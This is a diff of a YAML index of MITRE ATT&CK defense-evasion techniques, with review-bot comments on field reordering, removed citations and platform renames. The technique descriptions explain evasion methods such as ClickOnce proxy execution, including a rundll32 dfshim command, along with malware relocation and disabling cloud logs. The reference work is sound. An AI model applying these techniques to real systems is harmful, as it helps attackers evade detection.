url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10638,7 +10779,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10694,11 +10834,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10722,11 +10861,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -10751,9 +10889,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10833,7 +10970,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10867,7 +11003,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -10894,8 +11030,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests: []
T1553.004:
@@ -10990,48 +11124,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests: []
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
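Review bot: the only substantive changes in this hunk are the addition of `ilasm.exe(Citation: ATTACK IQ)` to the compiler list in the description and the new contributor; everything else (platforms, domains, contributors, id/type/created, external_references) is removed here and re-added lower in the object by the next two hunks, which makes the real edit hard to spot. A fixed key order in the generator would keep such updates to a few lines. One point for anyone deriving detections from this entry: the `x_mitre_detection` text still lists only csc.exe and GCC/MinGW, so ilasm.exe should be added to any compiler-execution monitoring built from it.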
@@ -11040,9 +11150,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -11054,12 +11169,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests: []
T1564.007:
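Review bot: `x_mitre_permissions_required: User` is dropped from T1027.004 here and not re-added; if anything in the repository derives an "elevation required" hint from that field, it needs a fallback now. The re-added `external_references` block also changes citation order (ClearSky, ATTACK IQ, TrendMicro) and adds `revoked: false`, both of which are harmless but should be mentioned as part of the upstream reorder rather than left to be discovered in the diff.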
@@ -11107,7 +11245,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -11133,12 +11271,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -11228,7 +11364,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1127.001:
@@ -11286,12 +11421,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests: []
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -11333,10 +11467,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -11360,18 +11493,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
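Review bot: the T1578.005 description drops the whole Azure subscription-hijacking paragraph (Global Administrator creating subscriptions or transferring a pay-as-you-go subscription to an attacker tenant), and the next hunk bumps the version from 1.0 to 2.0 to match. That is upstream content removal, not a generator artifact, so it is worth calling out in the commit message for anyone who built coverage mapping on the old text. Two formatting observations on the rewritten scalar: it changes from a `|-` block literal to a double-quoted folded string, which is harder to diff, and it ends with a trailing space before the closing quote (`T1535). "`); both are faithful to the upstream data and should not be hand-edited.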
@@ -11385,7 +11530,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -11397,20 +11542,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
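Review bot: Removing the "Microsoft Subscription Hijacking 2022" and "Microsoft Peach Sandstorm 2023" reference objects matches the citations dropped from the description, but please grep the rest of the T1578.005 entry (in particular x_mitre_detection, which is not shown in this diff) for any remaining `(Citation: Microsoft Subscription Hijacking 2022)` or `(Citation: Microsoft Peach Sandstorm 2023)` markers; a citation with no matching external_references entry would be a dangling reference in the generated index.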
@@ -11419,11 +11555,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
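Review bot: `spec_version: '2.1'` is deleted here and from every other technique touched by this patch (T1562.008, T1564.003, T1556.009, T1578.002, T1055.009, T1601.001, T1070.009, T1556.001, T1027.006, T1556.005). That is a STIX-level field rather than an ATT&CK one, so dropping it from the index is reasonable, but it is a schema change for anything that parses this file; please confirm no consumer or test in the repo keys on `spec_version` before merging.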
@@ -11432,6 +11567,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
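Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted here directly after kill_chain_phases, while the same key is later removed from the tail of the T1562.008 entry (with `x_mitre_modified_by_ref` moved up in the same way), so this is a reorder rather than a new value. The resulting key order differs from the freshly added T1127.002 and T1070.010 entries, where `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` follow `object_marking_refs`. If the generator emits keys in a canonical order, the T1562.008 entry looks like it was serialized with a different ordering; worth checking so future diffs stay small.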
@@ -11441,6 +11577,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -11452,13 +11589,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
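Review bot: The platform list for T1562.008 loses "Google Workspace", "Azure AD" and "Office 365" in favour of "Office Suite" and "Identity Provider" (SaaS and IaaS stay), with the version bumped 2.0 to 2.1 accordingly. Any per-platform index files or matrices that are keyed on the old platform names will need to be regenerated in the same change, otherwise they will continue to list this technique under platforms the technique object no longer declares.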
@@ -11503,9 +11640,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: GCP - Delete Activity Event Log
@@ -11629,18 +11763,140 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests: []
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+ - source_name: DFIR Report Trickbot June 2023
+ description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+ Retrieved May 31, 2024.
+ url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
